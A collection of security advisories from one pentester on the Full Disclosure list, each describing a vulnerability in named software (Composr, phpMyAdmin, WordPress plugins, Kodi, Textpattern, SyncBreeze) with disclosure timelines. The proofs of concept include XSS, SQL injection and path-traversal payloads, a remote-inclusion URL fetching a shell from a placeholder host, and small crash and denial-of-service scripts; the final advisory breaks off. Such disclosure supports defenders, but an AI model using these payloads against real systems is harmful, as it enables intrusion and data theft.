[FD] Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting
= MGC ALERT 2020-001 - Original release date: February 06, 2020 - Last revised: May 21, 2020 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2020-8789 = I. VULNERABILITY - Composr CMS 10.0.30 - (Authenticated) Cross-Site Scripting II. BACKGROUND - Composr CMS (or Composr) is a web application for creating websites. It is a combination of a Web content management system and Online community (Social Networking) software. Composr is licensed as free software and primarily written in the PHP programming language. III. DESCRIPTION - Has been detected a Persistent XSS vulnerability in Composr CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - Go to: Security -> Usergroups -> Edit Usergroup Select one Usergroup (for example Guest) and edit the Name (parameter name) for example with Guests">alert(1) The variable "name" it is not sanitized, later, if some user visit the "Zone editor" area, the XSS is executed, in the response you can view: alert(1)" /> V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or Javascript code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Composr CMS <= 10.0.30 VII. SOLUTION - Disable until a fix is available. VIII. REFERENCES - https://compo.sr/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - February 06, 2020 1: Initial release May 21, 2020 2: Last revision XI. DISCLOSURE TIMELINE - February 06, 2020 1: Vulnerability acquired by Manuel Garcia Cardenas February 06, 2020 2: Send to vendor April 06, 2020 3: New request, vendor doesn't answer. May 21, 2020 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 = I. VULNERABILITY - phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND - phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION - Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page. IV. PROOF OF CONCEPT - Exploit CSRF - Deleting main server Deleting Server 1 http://server/phpmyadmin/setup/index.php?page=servers=remove=1; style="display:none;" /> V. BUSINESS IMPACT - The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method. VI. SYSTEMS AFFECTED - phpMyAdmin <= 4.9.0.1 VII. SOLUTION - Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. VIII. REFERENCES - https://www.phpmyadmin.net/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. DISCLOSURE TIMELINE - June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting
= MGC ALERT 2019-002 - Original release date: April 10, 2019 - Last revised: May 22, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2019-11226 = I. VULNERABILITY - CMS Made Simple 2.2.10 - (Authenticated) Persistent Cross-Site Scripting II. BACKGROUND - CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area. III. DESCRIPTION - Has been detected a Persistent XSS vulnerability in CMS Made Simple, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - Go to: Content -> Content Manager -> News -> Add Article And post in the m1_title parameter for example test">alert(1) The variable "m1_title" it is not sanitized, later, if some user visit the content in the public area, the XSS is executed, in the response you can view: alert(1) V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or Javascript code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - CMS Made Simple <= 2.2.10 VII. SOLUTION - Disable until a fix is available, vendor doesn't accept XSS issues inside admin panel. VIII. REFERENCES - https://www.cmsmadesimple.org/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - April 10, 2019 1: Initial release May 22, 2019 2: Last revision XI. DISCLOSURE TIMELINE - April 10, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas April 10, 2019 2: Send to vendor April 22, 2019 3: New request, vendor doesn't accept XSS issues inside admin panel. May 22, 2019 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
= MGC ALERT 2019-001 - Original release date: February 06, 2019 - Last revised: March 13, 2019 - Discovered by: Manuel García Cárdenas - Severity: 7/10 (CVSS Base Score) - CVE-ID: CVE-2019-9618 = I. VULNERABILITY - WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion II. BACKGROUND - Hassle-free and user-friendly way to add a Media player directly to your website. III. DESCRIPTION - This bug was found in the file: /gracemedia-media-player/templates/files/ajax_controller.php Vulnerable code: require_once($_GET['cfg']); The parameter "cfg" it is not sanitized allowing include local files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT - The following URL have been confirmed that is vulnerable to local file inclusion. Local File Inclusion POC: GET /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds=../../../../../../../../../../etc/passwd V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - GraceMedia Media Player <= 1.0 VII. SOLUTION - Disable plugin until a fix is available, vendor does not fix after 2 requests. VIII. REFERENCES - https://es.wordpress.org/plugins/gracemedia-media-player/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - February 06, 2019 1: Initial release March 13, 2019 2: Revision to send to lists XI. DISCLOSURE TIMELINE - February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas February 06, 2019 2: Email to vendor without response February 21, 2019 3: Second email to vendor without response March 13, 2019 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Localize My Post 1.0 - Local File Inclusion
= MGC ALERT 2018-006 - Original release date: August 31, 2018 - Last revised: September 19, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7/10 (CVSS Base Score) - CVE-ID: CVE-2018-16299 = I. VULNERABILITY - WordPress Plugin Localize My Post 1.0 - Local File Inclusion II. BACKGROUND - This plugin makes it super easy to add and manage locations in your posts and pages III. DESCRIPTION - This bug was found in the file: /localize-my-post/ajax/include.php include($_REQUEST['file']); The parameter "file" it is not sanitized allowing include local files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT - The following URL have been confirmed that is vulnerable to local file inclusion. Local File Inclusion POC: GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Localize My Post <= 1.0 VII. SOLUTION - Disable plugin until a fix is available. https://github.com/julianburr/wp-plugin-localizemypost/issues/1 VIII. REFERENCES - https://es.wordpress.org/plugins/localize-my-post/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - August 31, 2018 1: Initial release September 19, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE - August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas August 31, 2018 2: Email to vendor without response September 10, 2018 3: Second email to vendor without response September 19, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion
= MGC ALERT 2018-005 - Original release date: August 31, 2018 - Last revised: September 19, 2018 - Discovered by: Manuel García Cárdenas - Severity: 9/10 (CVSS Base Score) - CVE-ID: CVE-2018-16283 = I. VULNERABILITY - WordPress Plugin Wechat Broadcast 1.2.0 - Local/Remote File Inclusion II. BACKGROUND - Wechat Broadcast allow push to the WeChat public account subscriber III. DESCRIPTION - This bug was found in the file: /wechat-broadcast/wechat/Image.php echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : ''); The parameter "url" it is not sanitized allowing include local or remote files To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT - The following URL have been confirmed that is vulnerable to local and remote file inclusion. Local File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd Remote File Inclusion POC: GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url= http://malicious.url/shell.txt V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Wechat Broadcast <= 1.2.0 VII. SOLUTION - Disable plugin until a fix is available. https://github.com/springjk/wordpress-wechat-broadcast/issues/14 VIII. REFERENCES - https://es.wordpress.org/plugins/wechat-broadcast/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - August 31, 2018 1: Initial release September 19, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE - August 31, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas August 31, 2018 2: Email to vendor without response September 10, 2018 3: Second email to vendor without response September 19, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
= MGC ALERT 2018-004 - Original release date: May 10, 2018 - Last revised: June 11, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) - CVE-ID: CVE-2018-10969 = I. VULNERABILITY - WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection II. BACKGROUND - Pie-Register is a quick and easy way to brand your Registration Pages on WordPress sites. III. DESCRIPTION - This bug was found using the portal in the files: /pie-register/classes/invitation_code_pagination.php:if ( isset( $_GET['order'] ) && $_GET['order'] ) /pie-register/classes/invitation_code_pagination.php:$order = $_GET['order']; And when the query is executed, the parameter "order" it is not sanitized. /pie-register/classes/invitation_code_pagination.php:$this->order = esc_sql( $order ); To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code. IV. PROOF OF CONCEPT - The following URL have been confirmed to all suffer from Time Based SQL Injection. Time Based SQL Injection POC: GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc (original) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1(2 seconds of response) GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes=name=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1(30 seconds of response) V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Pie Register <= 3.0.9 VII. SOLUTION - Disable website until a fix is available. VIII. REFERENCES - https://es.wordpress.org/plugins/pie-register/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - May 10, 2018 1: Initial release June 11, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE - May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas May 10, 2018 2: Send to vendor without response June 05, 2018 3: Second email to vendor without response June 11, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ----- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Kodi <= 17.6 - Persistent Cross-Site Scripting
= MGC ALERT 2018-003 - Original release date: March 19, 2018 - Last revised: April 16, 2018 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2018-8831 = I. VULNERABILITY - Kodi <= 17.6 - Persistent Cross-Site Scripting II. BACKGROUND - Kodi (formerly XBMC) is a free and open-source media player software application developed by the XBMC Foundation, a non-profit technology consortium. Kodi is available for multiple operating systems and hardware platforms, with a software 10-foot user interface for use with televisions and remote controls. III. DESCRIPTION - Has been detected a Persistent XSS vulnerability in the web interface of Kodi, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - Go to: Playlist -> Create Create a playlist injecting javascript code: The XSS is executed, in the victim browser. V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Kodi <= 17.6 VII. SOLUTION - Vendor include the fix: https://trac.kodi.tv/ticket/17814 VIII. REFERENCES - https://kodi.tv/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - March 19, 2018 1: Initial release April 16, 2018 2: Last revision XI. DISCLOSURE TIMELINE - March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas March 19, 2018 2: Send to vendor March 30, 2018 3: Vendo fix April 16, 2018 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in Textpattern <= 4.6.2
= MGC ALERT 2018-002 - Original release date: February 12, 2018 - Last revised: March 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) - CVE-ID: CVE-2018-7474 = I. VULNERABILITY - SQL Injection in Textpattern <= 4.6.2 II. BACKGROUND - Textpattern is a free and open-source content management system (CMS) based on PHP and MySQL, originally developed by Dean Allen and now developed by Team Textpattern. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "qty" on the page "index.php". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from SQL injection. /textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 Note: the variable "_txp_token" doest not work as a anti-csrf. POC: /textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'% 5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Textpattern <= 4.6.2 VII. SOLUTION - Disable website until a fix is available. VIII. REFERENCES - https://textpattern.com/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - February 12, 2018 1: Initial release March 12, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE - February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas February 12, 2018 2: Send to vendor without response February 26, 2018 3: Second email to vendor without response March 12, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)
= MGC ALERT 2018-001 - Original release date: December 22, 2017 - Last revised: January 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 (CVSS Base Score) = I. VULNERABILITY - PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH) II. BACKGROUND - PyroBatchFTP is a Windows software that lets you exchange files with FTP, FTPS or SFTP servers in an automatic and unattended way, using a simple yet powerful batch/script language. III. DESCRIPTION - The Enterprise version of PyroBatchFTP is affected by a Local Buffer Overflow vulnerability. The application does not check bounds when reading the file that will execute the script, resulting in a classic Buffer Overflow overwriting SEH handler. To exploit the vulnerability only is needed create a local script to interact with the application. IV. PROOF OF CONCEPT - my $file= "crash.cmd"; my $junk= "A" x 2052; my $nseh = ""; my $seh = ""; open($FILE,">$file"); print $FILE $junk.$nseh.$seh; close($FILE); print "File Created successfully\n"; V. BUSINESS IMPACT - Availability compromise can result from these attacks. VI. SYSTEMS AFFECTED - PyroBatchFTP <= 3.18 VII. SOLUTION - Vendor release 3.19 version http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt VIII. REFERENCES - https://www.emtec.com/pyrobatchftp/index.html IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - December 22, 2017 1: Initial release January 12, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE --------- December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas December 22, 2017 2: Send to vendor January 12, 2018 3: Vendor fix the vulnerability and release a new version January 12, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SyncBreeze <= 10.2.12 - Denial of Service
= MGC ALERT 2017-007 - Original release date: November 30, 2017 - Last revised: December 14, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 (CVSS Base Score) - CVE-ID: CVE-2017-17088 = I. VULNERABILITY - SyncBreeze <= 10.2.12 - Denial of Service II. BACKGROUND - SyncBreeze is a fast, powerful and reliable file synchronization solution for local disks, network shares, NAS storage devices and enterprise storage systems. III. DESCRIPTION - The Enterprise version of SyncBreeze is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server request in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service. To exploit the vulnerability only is needed use the version 1.1 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT - #!/usr/bin/python import sys, socket host = sys.argv[1] buffer="GET / HTTP/1.1\r\n" buffer+="Host: "+"A"*2000+"\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 80)) s.send(buffer) s.close() V. BUSINESS IMPACT - Availability compromise can result from these attacks. VI. SYSTEMS AFFECTED - SyncBreeze <= 10.2.12 VII. SOLUTION - Vendor release 10.3 version http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe VIII. REFERENCES - http://www.syncbreeze.com/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - November 30, 2017 1: Initial release December 14, 2017 2: Revision to send to lists XI. DISCLOSURE TIMELINE - November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas November 30, 2017 2: Send to vendor December 6, 2017 3: Vendor fix the vulnerability and release a new version December 14, 2017 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting
= MGC ALERT 2017-005 - Original release date: July 11, 2017 - Last revised: August 18, 2017 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) = I. VULNERABILITY - Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting II. BACKGROUND - Backdrop CMS is a simple, lightweight, and easy to use Content Management System used to build attractive, professional websites. III. DESCRIPTION - Has been detected a Persistent XSS vulnerability in Backdrop CMS, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - Go to: Structure -> Content types -> Add content type And post: POST /backdrop/admin/structure/types/add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 605 Referer: http://127.0.0.1/backdrop/admin/structure/types/add Cookie: Backdrop.tableDrag.showWeight=0; PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en; phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=120.60.120%257C%252F%257C; nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D; nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean; SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo Connection: close Upgrade-Insecure-Requests: 1 name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E=test_script_alert=_label=Demo=_default=1_enabled=1_enabled=1_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D_enabled=1_submitted=1_user_picture=1_default=2_per_page=50_mode=1_user_picture=1_form_location=1_preview=1_settings__active_tab=_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4_id=node_type_form=Save+and+add+fields The variable "name" it is not sanitized, later, if you go to the content type created and click in "Manage Displays" GET /backdrop/admin/structure/types/manage/test-script-alert/display HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate The XSS is executed, in the response you can view: Manage display Customized for test">alert(/XSS/) V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Backdrop CMS <= 1.7.1 VII. SOLUTION - Install the last release: https://github.com/backdrop/backdrop/releases/tag/1.7.2 VIII. REFERENCES - https://backdropcms.org/security/backdrop-sa-core-2017-009 IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - July 11, 2017 1: Initial release August 18, 2017 2: Last revision XI. DISCLOSURE TIMELINE - July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas July 11, 2017 2: Send to vendor August 17, 2017 3: Vendo fix in 1.7.2 version August 18, 2017 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in TheoCMS <= 2.0
= MGC ALERT 2017-004 - Original release date: July 11, 2017 - Last revised: August 12, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) = I. VULNERABILITY - SQL Injection in TheoCMS <= 2.0 II. BACKGROUND - Theo CMS is an ultra lightweight Content Management System for all types of websites. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "cat" on the page "admin.php". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from SQL injection. /theocms/core/admin.php?cat=0 POC: /theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs /theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs /theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - TheoCMS <= 2.0 VII. SOLUTION - Disable website until a fix is available. VIII. REFERENCES - http://theocms.com IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - July 11, 2017 1: Initial release August 12, 2017 2: Revision to send to lists XI. DISCLOSURE TIMELINE - July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas July 11, 2017 2: Send to vendor July 11, 2017 3: Vendor answer that is not a critical vulnerability an SQL Injection y admin page August 12, 2017 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ----- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
=
MGC ALERT 2017-003
- Original release date: April 06, 2017
- Last revised: April 10, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=
I. VULNERABILITY
-
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
II. BACKGROUND
-
WordPress event calendar is a FREE user-friendly responsive plugin to
manage multiple recurring events and with various options.
III. DESCRIPTION
-
This bug was found using the portal in the files:
/spider-event-calendar/calendar_functions.php: if
(isset($_POST['order_by'])) {
/spider-event-calendar/widget_Theme_functions.php:if
(isset($_POST['order_by']) && $_POST['order_by'] != '') {
And when the query is executed, the parameter "order_by" it is not
sanitized:
/spider-event-calendar/front_end/frontend_functions.php: $rows =
$wpdb->get_results($query." ".$order_by);
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code.
IV. PROOF OF CONCEPT
-
The following URL have been confirmed to all suffer from Time Based SQL
Injection.
Time Based SQL Injection POC:
POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1
search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(2)))a)
(2 seconds of response)
search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(30)))a)
(30 seconds of response)
V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-
Spider Event Calendar <= 1.5.51
VII. SOLUTION
-
